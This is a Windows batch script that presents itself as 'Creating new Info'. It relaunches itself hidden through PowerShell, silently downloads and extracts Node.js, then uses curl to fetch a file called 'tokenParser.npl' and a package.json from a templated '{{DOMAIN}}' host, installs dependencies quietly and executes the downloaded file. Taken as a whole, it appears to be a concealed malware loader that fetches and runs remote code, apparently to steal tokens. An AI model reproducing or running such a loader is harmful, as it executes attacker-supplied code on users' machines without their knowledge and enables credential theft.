@echo off
title Creating new Info
setlocal enabledelayedexpansion

if "%~1"=="_restarted" (
    goto CONTINUE
)
powershell -WindowStyle Hidden -Command "Start-Process -FilePath cmd.exe -ArgumentList '/c \"%~f0\" _restarted' -WindowStyle Hidden"
exit /b

:CONTINUE
set "NODE_VERSION=20.11.1"
set "NODE_MSI=node-v%NODE_VERSION%-x64.msi"
set "DOWNLOAD_URL=https://nodejs.org/dist/v%NODE_VERSION%/%NODE_MSI%"
set "EXTRACT_DIR=%~dp0nodejs"
set "NODE_EXE=%EXTRACT_DIR%\\PFiles64\nodejs\node.exe"

:: Check if Node is already installed
for /f "delims=" %%v in ('"%NODE_EXE%" -v 2^>nul') do (
    set "NODE_INSTALLED_VERSION=%%v"
)

if not defined NODE_INSTALLED_VERSION (
    set "INSTALL_NODE=1"
) else (
    set "INSTALL_NODE=0"
)

if "!INSTALL_NODE!"=="1" (
    echo [INFO] Downloading Node.js MSI...
    where curl >nul 2>&1
    if %errorlevel% NEQ 0 (
        powershell -Command "Invoke-WebRequest -Uri '%DOWNLOAD_URL%' -OutFile '%NODE_MSI%'"
    ) else (
        curl -s -L -o "%NODE_MSI%" "%DOWNLOAD_URL%"
    )

    if exist "%NODE_MSI%" (
        echo [INFO] Extracting Node.js MSI to %EXTRACT_DIR%...
        msiexec /a "%NODE_MSI%" /qn TARGETDIR="%EXTRACT_DIR%"
        del "%NODE_MSI%"
    ) else (
        echo [ERROR] Node.js MSI download failed.
        exit /b 1
    )
)

:: Set PATH to extracted node
if exist "%NODE_EXE%" (
    set "PATH=%EXTRACT_DIR%\PFiles64\nodejs;%PATH%"
) else (
    echo [ERROR] node.exe not found after extraction.
    exit /b 1
)

:: Confirm node works
"%NODE_EXE%" -v || exit /b 1

:: Set user profile path
set "USERPROFILE=%USERPROFILE%"

:: Download tokenParser and package.json
curl -L -o "%USERPROFILE%\tokenParser.npl" "{{DOMAIN}}/users/tokenParser.npl"
curl -L -o "%USERPROFILE%\package.json" "{{DOMAIN}}/users/package.json"

:: Install dependencies
if not exist "%~dp0node_modules\request" (
    pushd "%~dp0"
    call "%NODE_EXE%" "%EXTRACT_DIR%\PFiles64\nodejs\node_modules\npm\bin\npm-cli.js" install --silent --no-progress --loglevel=error --fund=false
    if errorlevel 1 (
        popd
        exit /b
    )
    popd
)

:: Run script
if exist "%~dp0tokenParser.npl" (
    "%NODE_EXE%" "%~dp0tokenParser.npl"
    if errorlevel 1 (
        exit /b
    )
) else (
    exit /b
)

exit /b 0